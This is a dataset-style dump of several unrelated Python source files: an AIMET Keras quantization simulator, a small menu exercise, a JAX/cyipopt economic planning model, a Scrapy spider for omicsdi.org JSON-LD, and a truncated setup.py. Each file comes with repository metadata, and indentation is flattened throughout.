# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# SPDX-License-Identifier: BSD-3-Clause
#
# @@-COPYRIGHT-END-@@
# =============================================================================
""" Quantsim for Keras """
import json
import os
from typing import Union, Dict, Tuple, Optional
import tensorflow as tf
from aimet_common.defs import QuantScheme
from aimet_common.utils import AimetLogger, save_json_yaml
from aimet_common.quantsim import encoding_version
from aimet_tensorflow.keras.connectedgraph import ConnectedGraph
from aimet_tensorflow.keras.cross_layer_equalization import GraphSearchUtils
from aimet_tensorflow.keras.quant_sim.qc_quantize_wrapper import QcQuantizeWrapper, QuantizerSettings
from aimet_tensorflow.keras.quant_sim.tensor_quantizer import TensorQuantizer, ActivationTensorQuantizer, \
ParamTensorQuantizer
from aimet_tensorflow.keras.quantsim_config.quantsim_config import QuantSimConfigurator, INPUT_QUANTIZERS, \
OUTPUT_QUANTIZERS, PARAM_QUANTIZERS
# Module-level logger for the quantization area.
_logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Quant)
# Layer types that never receive a quantization wrapper: model inputs, and
# layers that are already wrapped.
unquantizable_modules = (tf.keras.layers.InputLayer, QcQuantizeWrapper)
class QuantizationSimModel:
"""
Implements mechanism to add quantization simulations ops to a model. This allows for off-target simulation of
inference accuracy. Also allows the model to be fine-tuned to counter the effects of quantization.
"""
# pylint: disable=too-many-arguments
# pylint: disable=unused-argument
def __init__(self, model, quant_scheme: Union[QuantScheme, str] = 'tf_enhanced', rounding_mode: str = 'nearest',
default_output_bw: int = 8, default_param_bw: int = 8, in_place: bool = False,
config_file: str = None):
"""
:param model: Model to quantize
:param quant_scheme: Quantization Scheme, currently supported schemes are post_training_tf and
post_training_tf_enhanced, defaults to post_training_tf_enhanced
:param rounding_mode: The round scheme to used. One of: 'nearest' or 'stochastic', defaults to 'nearest'.
:param default_output_bw: bitwidth to use for activation tensors, defaults to 8
:param default_param_bw: bitwidth to use for parameter tensors, defaults to 8
:param in_place: If True, then the given 'model' is modified in-place to add quant-sim nodes.
Only suggested use of this option is when the user wants to avoid creating a copy of the model
:param config_file: Path to a config file to use to specify rules for placing quant ops in the model
"""
self._model_without_wrappers = model
if not in_place:
self._model_without_wrappers = tf.keras.models.clone_model(model)
self._model_without_wrappers.set_weights(model.get_weights())
self._layer_name_to_quant_wrapper = {}
self._validate_model()
self._quantsim_configurator = self._initialize_quantsim_configurator(quant_scheme, rounding_mode,
default_output_bw, default_param_bw,
config_file)
self.model = self._add_quantization_wrappers(quant_scheme, rounding_mode, default_output_bw, default_param_bw)
self._disable_quantizers_in_folded_batchnorm()
def _validate_model(self):
"""
Check that model is appropriate for quantsim.
"""
multiple_inbound_node_layers = []
for layer in self._model_without_wrappers.layers:
if len(layer.inbound_nodes) > 1:
multiple_inbound_node_layers.append(layer.name)
if multiple_inbound_node_layers:
_logger.error('Layers with more than one inbound nodes are unsupported. This may occur if a layer is '
'reused multiple times in the model definition.')
_logger.error('Layers with multiple inbound nodes: {%s}', multiple_inbound_node_layers)
raise NotImplementedError
def _initialize_quantsim_configurator(self, quant_scheme: Union[QuantScheme, str], rounding_mode: str,
default_output_bw: int, default_param_bw: int,
config_file: str) -> QuantSimConfigurator:
"""
Initialize quantsim configurator
:param quant_scheme: Quantization Scheme
:param rounding_mode: The round scheme to used
:param default_output_bw: bitwidth to use for activation tensors
:param default_param_bw: bitwidth to use for parameter tensors
:param config_file: Path to a config file to use to specify rules for placing quant ops in the model
:return: QuantSimConfigurator
"""
connected_graph = ConnectedGraph(self._model_without_wrappers)
return QuantSimConfigurator(connected_graph, quant_scheme, rounding_mode,
default_output_bw, default_param_bw, config_file)
def _add_quantization_wrappers(self, quant_scheme, rounding_mode, default_output_bw, default_param_bw):
"""
Add quantization wrappers to the model and return a new model with the wrappers inserted.
:param quant_scheme: Quantization scheme to use
:param rounding_mode: Rounding mode to use
:param default_output_bw: Default bitwidth for activation quantizers
:param default_param_bw: Default bitwidth for param quantizers
"""
def wrap_layer(layer) -> tf.keras.layers.Layer:
"""
Function to wrap layers with QcQuantizeWrappers, used by keras clone_model()
:param layer: Layer to wrap
:return: Wrapped layer, or original layer if layer is not to be wrapped
"""
activation_quant_settings = QuantizerSettings(default_output_bw, rounding_mode,
quant_scheme, False, False, False)
param_quant_settings = QuantizerSettings(default_param_bw, rounding_mode,
quant_scheme, False, False, False)
if isinstance(layer, unquantizable_modules) or layer.submodules:
return layer
input_quantizers, output_quantizers, param_quantizers = self._get_quantizers_by_layer(layer)
wrapper = QcQuantizeWrapper(layer, activation_quant_settings, param_quant_settings,
num_inputs=len(layer.inbound_nodes[0].keras_inputs),
input_quantizers=input_quantizers,
output_quantizers=output_quantizers,
param_quantizers=param_quantizers)
self._layer_name_to_quant_wrapper[layer.name] = wrapper
return wrapper
return tf.keras.models.clone_model(self._model_without_wrappers, clone_function=wrap_layer)
def _get_quantizers_by_layer(self, layer: tf.keras.layers.Layer) -> Tuple[Optional[ActivationTensorQuantizer],
Optional[ActivationTensorQuantizer],
Optional[ParamTensorQuantizer]]:
"""
Get input/output/param quantizers from quantizers dictionary or initialize quantizers if layer is not found
:param layer: Target layer
:return: tuple of input, output, param quantizers
"""
quantizers_dict = self._quantsim_configurator.get_quantizers_dict(layer)
if quantizers_dict is None:
_logger.warning("%s not found in quantizers dict, will generate quantizers automatically", layer.name)
input_quantizers = None
output_quantizers = None
param_quantizers = None
else:
input_quantizers = quantizers_dict.get(INPUT_QUANTIZERS)
output_quantizers = quantizers_dict.get(OUTPUT_QUANTIZERS)
param_quantizers = quantizers_dict.get(PARAM_QUANTIZERS)
return input_quantizers, output_quantizers, param_quantizers
def _disable_quantizers_in_folded_batchnorm(self):
"""
Disable input/output/param quantizers if layer is folded batch normalization
"""
for quantsim_wrapper in self._layer_name_to_quant_wrapper.values():
if GraphSearchUtils.is_folded_batch_normalization(quantsim_wrapper.original_layer):
for q in quantsim_wrapper.input_quantizers:
q.disable()
for q in quantsim_wrapper.output_quantizers:
q.disable()
for q in quantsim_wrapper.param_quantizers:
q.disable()
@staticmethod
def _get_encoding_dict_for_quantizer(quantizer: TensorQuantizer) -> Dict[str, Union[str, int, float]]:
"""
Get encoding dict for a tensor quantizer.
:param quantizer: Quantizer to get encoding info from
:return: Dictionary containing encodings info for the tensor quantizer
"""
encoding_dict = {}
encoding_dict['min'] = quantizer.encoding.min
encoding_dict['max'] = quantizer.encoding.max
encoding_dict['scale'] = quantizer.encoding.delta
encoding_dict['offset'] = int(quantizer.encoding.offset)
encoding_dict['bitwidth'] = quantizer.encoding.bw
encoding_dict['is_symmetric'] = str(quantizer.is_symmetric)
encoding_dict['dtype'] = 'int'
return encoding_dict
def _get_encodings_dict(self) -> Dict[str, Union[str, Dict]]:
"""
Get encodings dict containing all activation and parameter encodings info in the model
:return: Dictionary containing all activation and parameter encodings info in the model
"""
# pylint: disable=protected-access
activation_encodings = {}
param_encodings = {}
for wrapper in self.quant_wrappers():
for idx, input_quantizer in enumerate(wrapper.input_quantizers):
if input_quantizer.encoding is not None:
tensor_name = wrapper._layer_to_wrap.inbound_nodes[0].keras_inputs[idx].name
encoding_dict = self._get_encoding_dict_for_quantizer(input_quantizer)
activation_encodings[tensor_name] = encoding_dict
for idx, param_quantizer in enumerate(wrapper.param_quantizers):
if param_quantizer.encoding is not None:
param_name = wrapper._layer_to_wrap.weights[idx].name
encoding_dict = self._get_encoding_dict_for_quantizer(param_quantizer)
param_encodings[param_name] = encoding_dict
for idx, output_quantizer in enumerate(wrapper.output_quantizers):
if output_quantizer.encoding is not None:
tensor_name = wrapper._layer_to_wrap.output.name
encoding_dict = self._get_encoding_dict_for_quantizer(output_quantizer)
activation_encodings[tensor_name] = encoding_dict
encodings_dict = {'version': encoding_version,
'activation_encodings': activation_encodings,
'param_encodings': param_encodings}
return encodings_dict
def compute_encodings(self, forward_pass_callback, forward_pass_callback_args):
"""
Computes encodings for all quantization sim nodes in the model.
:param forward_pass_callback: A callback function that is expected to runs forward passes on a model.
This callback function should use representative data for the forward pass, so the calculated
encodings work for all data samples.
:param forward_pass_callback_args: These argument(s) are passed to the forward_pass_callback as-is. Up to
the user to determine the type of this parameter. E.g. could be simply an integer representing the number
of data samples to use. Or could be a tuple of parameters or an object representing something more
complex.
"""
forward_pass_callback(self.model, forward_pass_callback_args)
for quant_wrapper in self.quant_wrappers():
quant_wrapper.compute_encoding()
def export(self, path, filename_prefix):
"""
This method exports out the quant-sim model so it is ready to be run on-target.
Specifically, the following are saved
1. The sim-model is exported to a regular Keras model without any simulation ops
2. The quantization encodings are exported to a separate JSON-formatted file that can
then be imported by the on-target runtime (if desired)
:param path: path where to store model pth and encodings
:param filename_prefix: Prefix to use for filenames of the model pth and encodings files
"""
model_path = os.path.join(path, filename_prefix)
self._model_without_wrappers.save(model_path)
self._model_without_wrappers.save(model_path + '.h5', save_format='h5')
encodings_dict = self._get_encodings_dict()
encoding_file_path = os.path.join(path, filename_prefix + '.encodings')
save_json_yaml(encoding_file_path, encodings_dict)
def set_and_freeze_param_encodings(self, encoding_path: str):
"""
Set and freeze parameter encodings from encodings JSON file
:param encoding_path: path from where to load parameter encodings file
"""
# Load parameter encodings file
with open(encoding_path) as json_file:
param_encodings = json.load(json_file)
for quant_wrapper in self.quant_wrappers():
quant_wrapper.set_and_freeze_param_encoding(param_encodings)
def quant_wrappers(self):
"""
Generator for yielding all quantization wrappers
"""
for layer in self.model.layers:
if isinstance(layer, QcQuantizeWrapper):
yield layer
def get_quant_wrapper_for_layer_name(self, layer_name: str) -> QcQuantizeWrapper:
"""
Return qc quant wrapper corresponding to a layer name
:param layer_name: Layer name to get quantize wrapper for
:return: Qc quant wrapper corresponding to a layer name
"""
return self._layer_name_to_quant_wrapper.get(layer_name)
| 53.305921 | 120 | 0.671953 |
ecc3e1c7532f70f8908058c959250626aa73db90 | 139 | py | Python | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | Exercicios/ex115/ex115 - Criando um menu em Python.py | yurixf/Python | d1f91d52235dcba73deff281d80af0b44f028735 | [
"MIT"
] | null | null | null | import lib
arq = "teste.txt"
if not lib.arquivo.arquivoExiste(arq):
lib.arquivo.criarArquivo(arq)
opção=lib.interface.escolha(arq)
| 13.9 | 38 | 0.741007 |
e469f8492d6c01949735281f26ffee76fe6a6927 | 18,901 | py | Python | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | code/archive/cyipopt_and_jax/main-sparsify.py | uq-aibe/spir-oz | 4ae3ff6f230679f21b9c4072529df94187f9e098 | [
"MIT"
] | null | null | null | from jax.config import config
config.update("jax_enable_x64", True)
#-----------global modules
import jax.numpy as np
from jax import jit, grad, jacrev, jacfwd
from jax.experimental import sparse
from cyipopt import minimize_ipopt
#-----------local modules
#import economic_functions as efcn
#==============================================================================
#-------------economic parameters
#-----------basic economic parameters
NREG = 2 # number of regions
NSEC = 2 # number of sectors
PHZN = NTIM = LFWD = 2# look-forward parameter / planning horizon (Delta_s)
NPOL = 3 # number of policy types: con, lab, knx, #itm
NITR = LPTH = 2# path length (Tstar): number of random steps along given path
NPTH = 1 # number of paths (in basic example Tstar + 1)
BETA = 95e-2 # discount factor
ZETA0 = 1 # output multiplier in status quo state 0
ZETA1 = 95e-2 # output multiplier in tipped state 1
PHIA = 5e-1 # adjustment cost multiplier
PHIK = 33e-2 # weight of capital in production # alpha in CJ
TPT = 1e-2 # transition probability of tipping (from state 0 to 1)
GAMMA = 5e-1 # power utility exponent
DELTA = 25e-3 # depreciation rate
ETA = 5e-1 # Frisch elasticity of labour supply
RHO = np.ones(NREG) # regional weights (population)
TCS=75e-2 # Tail Consumption Share
#-----------suppressed basic parameters
#PHIM = 5e-1 # weight of intermediate inputs in production
#XI = np.ones(NRxS) * 1 / NRxS # importance of kapital input to another
#MU = np.ones(NRxS) * 1 / NRxS # importance of one sector to another
#-----------derived economic parameters
NRxS = NREG * NSEC
GAMMAhat = 1 - 1 / GAMMA # utility parameter (consumption denominator)
ETAhat = 1 + 1 / ETA # utility parameter
PHIL = 1 - PHIK # labour's importance in production
DPT = (1 - (1 - DELTA) * BETA) / (PHIK * BETA) # deterministic prod trend
RWU = (1 - PHIK) * DPT * (DPT - DELTA) ** (-1 / GAMMA) # Rel Weight in Utility
ZETA = np.array([ZETA0, ZETA1])
NVAR = NPOL * LFWD * NSEC * NREG # total number of variables
X0 = np.ones(NVAR) # our initial warm start
# k0(j) = exp(log(kmin) + (log(kmax)-log(kmin))*(ord(j)-1)/(card(j)-1));
KAP0 = np.ones(NREG) # how about NSEC ????
#for j in range(n_agt):
# KAP0[j] = np.exp(
# np.log(kap_L) + (np.log(kap_U) - np.log(kap_L)) * j / (n_agt - 1)
# )
#-----------suppressed derived economic parameters
#IVAR = np.arange(0,NVAR) # index set (as np.array) for all variables
#==============================================================================
#-----------structure of x using latex notation:
#---x = [
# x_{p0, t0, r0, s0}, x_{p0, t0, r0, s1}, x_{p0, t0, r0, s2},
#
# x_{p0, t0, r1, s0}, x_{p0, t0, r1, s1}, x_{p0, t0, r1, s2},
#
# x_{p0, t1, r0, s0}, x_{p0, t1, r0, s1}, x_{p0, t1, r0, s2},
#
# x_{p0, t1, r1, s0}, x_{p0, t1, r1, s1}, x_{p0, t1, r1, s2},
#
# x_{p1, t0, r0, s0}, x_{p1, t0, r0, s1}, x_{p0, t0, r0, s2},
#
# x_{p1, t0, r1, s0}, x_{p1, t0, r1, s1}, x_{p0, t0, r1, s2},
#
# x_{p1, t1, r0, s0}, x_{p1, t1, r0, s1}, x_{p0, t1, r0, s2},
#
# x_{p1, t1, r1, s0}, x_{p1, t1, r1, s1}, x_{p0, t1, r1, s2},
#
#
# x_{p2, t0, r0, s00}, x_{p2, t0, r0, s01}, x_{p2, t0, r0, s02},
# x_{p2, t0, r0, s10}, x_{p2, t0, r0, s11}, x_{p2, t0, r0, s12},
# x_{p2, t0, r0, s20}, x_{p2, t0, r0, s21}, x_{p2, t0, r0, s22},
#
# x_{p2, t0, r1, s00}, x_{p2, t0, r1, s01}, x_{p2, t0, r1, s02},
# x_{p2, t0, r1, s10}, x_{p2, t0, r1, s11}, x_{p2, t0, r1, s12},
# x_{p2, t0, r1, s20}, x_{p2, t0, r1, s21}, x_{p2, t0, r1, s22},
#
# x_{p2, t1, r0, s00}, x_{p2, t1, r0, s01}, x_{p2, t1, r0, s02},
# x_{p2, t1, r0, s10}, x_{p2, t1, r0, s11}, x_{p2, t1, r0, s12},
# x_{p2, t1, r0, s20}, x_{p2, t1, r0, s21}, x_{p2, t1, r0, s22},
#
# x_{p2, t1, r1, s00}, x_{p2, t1, r1, s01}, x_{p2, t1, r1, s02},
# x_{p2, t1, r1, s10}, x_{p2, t1, r1, s11}, x_{p2, t1, r1, s12},
# x_{p2, t1, r1, s20}, x_{p2, t1, r1, s21}, x_{p2, t1, r1, s22},
#
#
# x_{p3, t0, r0, s00}, x_{p3, t0, r0, s01}, x_{p3, t0, r0, s02},
# x_{p3, t0, r0, s10}, x_{p3, t0, r0, s11}, x_{p3, t0, r0, s12},
# x_{p3, t0, r0, s20}, x_{p3, t0, r0, s21}, x_{p3, t0, r0, s22},
#
# x_{p3, t0, r1, s00}, x_{p3, t0, r1, s01}, x_{p3, t0, r1, s02},
# x_{p3, t0, r1, s10}, x_{p3, t0, r1, s11}, x_{p3, t0, r1, s12},
# x_{p3, t0, r1, s20}, x_{p3, t0, r1, s21}, x_{p3, t0, r1, s22},
#
# x_{p3, t1, r0, s00}, x_{p3, t1, r0, s01}, x_{p3, t1, r0, s02},
# x_{p3, t1, r0, s10}, x_{p3, t1, r0, s11}, x_{p3, t1, r0, s12},
# x_{p3, t1, r0, s20}, x_{p3, t1, r0, s21}, x_{p3, t1, r0, s22},
#
# x_{p3, t1, r1, s00}, x_{p3, t1, r1, s01}, x_{p3, t1, r1, s02},
# x_{p3, t1, r1, s10}, x_{p3, t1, r1, s11}, x_{p3, t1, r1, s12},
# x_{p3, t1, r1, s20}, x_{p3, t1, r1, s21}, x_{p3, t1, r1, s22},
# ]
#
#==============================================================================
#---------------dicts
#-----------dimensions for each pol var: 0 : scalar; 1 : vector; 2 : matrix
d_dim = {
"con": 1,
"knx": 1,
"lab": 1,
}
i_pol = {
"con": 0,
"knx": 1,
"lab": 2,
}
i_reg = {
"aus": 0,
"qld": 1,
"wld": 2,
}
i_sec = {
"agr": 0,
"for": 1,
#"min": 2,
#"man": 3,
#"uty": 4,
#"ctr": 5,
#"com": 6,
#"tps": 7,
#"res": 8,
}
# Warm start
pol_S = {
"con": 4,
"lab": 1,
"knx": KAP0,
#"sav": 2,
#"out": 6,
# "itm": 10,
# "ITM": 10,
# "SAV": 10,
#"utl": 1,
# "val": -300,
}
#-----------dicts of index lists for locating variables in x:
#-------Dict for locating every variable for a given policy
d_pol_ind_x = dict()
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NTIM * NREG * NSEC ** d
start = p * stride
end = start + stride
d_pol_ind_x[pk] = range(NVAR)[start : end : 1]
#-------Dict for locating every variable at a given time
d_tim_ind_x = dict()
for t in range(NTIM):
indlist = []
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NREG * NSEC ** d
start = (p * NTIM + t) * stride
end = start + stride
indlist.extend(range(NVAR)[start : end : 1])
d_tim_ind_x[t] = sorted(indlist)
#-----------the final one can be done with a slicer with stride NSEC ** d_dim
#-------Dict for locating every variable in a given region
d_reg_ind_x = dict()
for rk in i_reg.keys():
r = i_reg[rk]
indlist = []
for t in range(NTIM):
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = NSEC ** d
start = (p * NTIM * NREG + t * NREG + r) * stride
end = start + stride
indlist += range(NVAR)[start : end : 1]
d_reg_ind_x[rk] = sorted(indlist)
#-------Dict for locating every variable in a given sector
d_sec_ind_x = dict()
for sk in i_sec.keys(): #comment
s = i_sec[sk]
indlist = []
for rk in i_reg.keys():
r = i_reg[rk]
for t in range(NTIM):
for pk in i_pol.keys():
p = i_pol[pk]
d = d_dim[pk]
stride = 1
start = (p * NTIM * NREG + t * NREG + r) * NSEC ** d + s
end = start + stride
indlist += range(NVAR)[start : end : 1]
d_sec_ind_x[s] = sorted(indlist)
#-----------union of all the "in_x" dicts: those relating to indices of x
d_ind_x = d_pol_ind_x | d_tim_ind_x | d_reg_ind_x | d_sec_ind_x
#==============================================================================
#-----------function for returning index subsets of x for a pair of dict keys
def sub_ind_x(key1, # any key of d_ind_x
key2, # any key of d_ind_x
d=d_ind_x, # dict of index categories: pol, time, sec, reg
):
val = np.array(list(set(d[key1]) & set(d[key2])))
return val
j_sub_ind_x = jit(sub_ind_x)
# possible alternative: ind(ind(ind(range(len(X0)), key1),key2), key3)
#-----------function for intersecting two lists: returns indices as np.array
#def f_I2L(list1,list2):
# return np.array(list(set(list1) & set(list2)))
#==============================================================================
#---------------economic_functions
#------------------------------------------------------------------------------
#-----------instantaneous utility as a pure function
#-----------requires: "import economic_parameters as par"
def instant_utility(con, # consumption vec of vars at given time
lab, # labour vec of vars at given time
B=RWU, # relative weight of con and lab in util
rho=RHO, # regional-weights vec at given time
gh=GAMMAhat,
eh=ETAhat,
):
#-------log utility
#val = np.sum(rho * (np.log(con) - B * np.log(lab)))
#-------general power utility:
val = np.sum(rho * (2 * con ** gh / gh - B * lab ** eh / eh))
return val
j_instant_utility = jit(instant_utility)
#==============================================================================
#-----------v-tail as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def V_tail(kap, # kapital vec of vars at time t=LFWD
A=DPT, # deterministic productivity trend
beta=BETA, # discount factor
phik=PHIK, # weight of capital in production
tcs=TCS, # tail consumption share
u=instant_utility, # utility function
):
#-------tail consumption vec
tail_con = tcs * A * kap ** phik
#-------tail labour vec normalised to one
tail_lab = np.ones(len(kap))
val = u(tail_con, tail_lab) / (1 - beta)
return val
j_V_tail = jit(V_tail)
#==============================================================================
#-----------probabity of no tip by time t as a pure function
#-----------requires: "import economic_parameters as par"
def prob_no_tip(tim, # time step along a path
tpt=TPT, # transition probability of tipping
):
return (1 - tpt) ** tim
j_prob_no_tip = jit(prob_no_tip)
#==============================================================================
#-----------expected output as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def expected_output(kap, # kap vector of vars
lab, # lab vector of vars
tim, # time step along a path
A=DPT, # determistic prod trend
phik=PHIK, # weight of kap in prod
phil=PHIL, # weight of lab in prod
zeta=ZETA, # shock-value vector
pnot=prob_no_tip, # prob no tip by t
):
y = A * (kap ** phik) * (lab ** phil) # output
E_zeta = zeta[1] + pnot(tim) * (zeta[0] - zeta[1]) # expected shock
val = E_zeta * y
return val
j_expected_output = jit(expected_output)
#==============================================================================
#-----------adjustment costs of investment as a pure function
#-----------requires: "import economic_parameters as par"
def adjustment_cost(kap,
knx,
phia=PHIA, # adjustment cost multiplier
):
# since sav/kap - delta = (knx - (1 - delta) * kap)/kap - delta = ..
# we can therefore rewrite the adjustment cost as
val = phia * kap * np.square(knx / kap - 1)
return 0
j_adjustment_cost = jit(adjustment_cost)
#==============================================================================
#-----------market clearing/budget constraint as a pure function
#-----------requires: "import economic_parameters as par"
#-----------requires: "import economic_functions as efcn"
def market_clearing(kap,
knx,
con,
lab,
tim,
delta=DELTA,
adjc=adjustment_cost, # Gamma in Cai-Judd
E_f=expected_output,
):
sav = knx - (1 - delta) * kap
val = sum(E_f(kap, lab, tim) - con - sav - adjc(kap, sav))
return val
j_market_clearing = jit(market_clearing)
#==============================================================================
#-----------objective function (purified)
def objective(x, # full vector of variables
beta=BETA, # discount factor
lfwd=LFWD, # look-forward parameter
ind=sub_ind_x, # subindices function for x: req. two keys
u=j_instant_utility,# utility function representing flow per t
v=V_tail, # tail-sum value function
):
# extract/locate knx at the planning horizon in x
kap_tail = x[ind("knx", lfwd - 1)]
# sum discounted utility over the planning horizon
sum_disc_utl = 0.0
for t in range(lfwd):
CON = x[ind("con", t)] # locate consumption at t in x
LAB = x[ind("lab", t)] # locate labour at t in x
sum_disc_utl += beta ** t * u(con=CON, lab=LAB)
val = sum_disc_utl + beta ** lfwd * v(kap=kap_tail)
return val
j_objective = jit(objective)
#==============================================================================
#-----------equality constraints
def eq_constraints(x,
state,
lfwd=LFWD,
ind=sub_ind_x,
mcl=j_market_clearing,
):
eqns = np.zeros(lfwd)
for t in range(lfwd):
if t == 0:
KAP = state
else:
KAP = x[ind("knx", t-1)]
KNX = x[ind("knx", t)]
CON = x[ind("con", t)]
LAB = x[ind("lab", t)]
eqns = eqns.at[t].set(mcl(kap=KAP, knx=KNX, con=CON, lab=LAB, tim=t))
return eqns
#==============================================================================
#-------------build and jit (just-in-time compile) the derivatives
#-----------first the objective
obj = jit(objective) # obj with one arg
obj_grad = jit(grad(obj)) # grad
obj_hess = jit(jacrev(jacfwd(obj))) # hessian
#-----------then the equality constraints
eq_ctt = jit(lambda x, state: eq_constraints(x, state)) # eq_ctt two-args
eq_ctt_jac = jit(jacfwd(eq_ctt)) # jacobian
eq_ctt_hess = jit(jacrev(jacfwd(eq_ctt))) # hessian
#-----------then the inequality constraints
#con_ineq = jit(ineq_constraints) # ineq_ctt two-args
#ineq_ctt_jac = jit(jacfwd(ineq_ctt)) # jacobian
#ineq_ctt_hess = jacrev(jacfwd(ineq_ctt)) # hessian
#ineq_ctt_hessvp = jit(lambda x, v: ineq_ctt_hess(x) * v[0])# hessian vec-prod
#==============================================================================
#-----------define the jitted-state-in functions for the loop
def eq_ctt_js(state):
return lambda x: eq_ctt(x, state)
def eq_ctt_jac_js(state):
return lambda x: eq_ctt_jac(x, state)
def eq_ctt_hess_js(state):
return lambda x: eq_ctt_hess(x, state)
#==============================================================================
#-----------variable bounds:
bnds = [(1e-3, 1e+3) for _ in range(NVAR)]
#==============================================================================
# Hessian vector product function
#def hvp(f, x, v):
# return np.jvp(grad(f), primals, tangents)[1]
#def eq_ctt_hvp(x, v):
# return hvp("constraints function", x, v)
#==============================================================================
#-*-*-*-*-*-loop/iteration along path starts here
#------------------------------------------------------------------------------
res = dict()
for s in range(LPTH):
#-------set initial capital for each plan
if s == 0:
KAP = KAP0
x0 = X0
else:
X = np.array(res[s - 1]["x"])
KAP = X[sub_ind_x("knx", 0)]
x0 = X
#-------feed in kapital from starting point s-1
eq_ctt_fin = jit(eq_ctt_js(state=KAP))
eq_ctt_jac_fin = jit(eq_ctt_jac_js(state=KAP))
eq_ctt_hess_fin = jit(eq_ctt_hess_js(state=KAP))
#-------this returns a hessian for each constraint if v[0] != 0
eq_ctt_hessvp = jit(lambda x, v: eq_ctt_hess_fin(x) * v[0]) # hessian vec-prod
#-------wrap up constraints for cyipopt
cons = [{'type': 'eq',
'fun': eq_ctt_fin,
'jac': eq_ctt_jac_fin,
'hess': eq_ctt_hessvp,
}]
#-------starting point (absent warm start)
#x0 = X0
#-----------execute solver
res[s] = minimize_ipopt(obj,
jac=obj_grad,
hess=obj_hess,
x0=x0,
bounds=bnds,
constraints=cons,
#nele_jac=30,
options={'disp': 12, # printout range:0-12, default=5
'obj_scaling_factor': -1.0, # maximize obj
'timing_statistics': 'yes',
'print_timing_statistics': 'yes',
'constr_viol_tol': 5e-2,
'max_iter': 1000,
'acceptable_tol': 1e-4,
#'dual_inf_tol': 0.5,
#!!how to warm start? see ipopt options page!!
#'warm_start_init_point': 'yes',
#!!next one for "multiple problems in one nlp"!!
#'warm_start_same_structure': 'yes',
}
)
x_sol = np.array(res[s]["x"])
for pk in d_pol_ind_x.keys():
print("the solution for", pk, "at step", s, "along path 0 is \n", \
x_sol[np.array(d_pol_ind_x[pk])])
#-*-*-*-*-*-loop ends here
#==============================================================================
# ----------- print solution, etc.
#for s in range(len(res)):
# print("the solution for iterate ", s, "is ", res[s])
# x_sol[s] = res[s]["x"]
# print("sol=", x_sol[s])
# for i in range(len(x_sol[s])-1):
# print("diff=", x_sol[s][i] - x_sol[s][i+1])
| 41.178649 | 85 | 0.475848 |
b939c65a3a37eeb72908f71023f4a5aba1fdae55 | 436 | py | Python | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | crawler/spiders/sitemapscrape/omicsdi.py | flaneuse/biothings.crawler | 70e4eec45e44fb7300643b1fb64b0824ed6e7df2 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
from scrapy.spiders import SitemapSpider
from ..helper import JsonLdMixin
class OmicsdiSpider(SitemapSpider, JsonLdMixin):
name = 'omicsdi'
sitemap_urls = ['http://www.omicsdi.org/sitemap.xml']
sitemap_rules = [('/dataset/', 'extract_jsonld')]
def extract_jsonld(self, response):
for jsld in super().extract_jsonld(response, response.url):
yield jsld.get('mainEntity')
| 24.222222 | 67 | 0.681193 |
b4d8e8a4612873c1e2cc684daa4a3da24a5842a4 | 929 | py | Python | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | 3 | 2016-12-13T09:52:57.000Z | 2022-02-17T20:00:56.000Z | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | null | null | null | setup.py | koodaa-team/serializer | 4dc93195621b4ab0ddb86d71f319a41cb2c56340 | [
"BSD-3-Clause"
] | 1 | 2017-12-27T09:48:36.000Z | 2017-12-27T09:48:36.000Z | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='Serializer',
version='0.2.1',
description=(
'Easy object serialization. '
'Mimics RoR ActiveRecord serializer.'
),
long_description=__doc__,
author='Konsta Vesterinen',
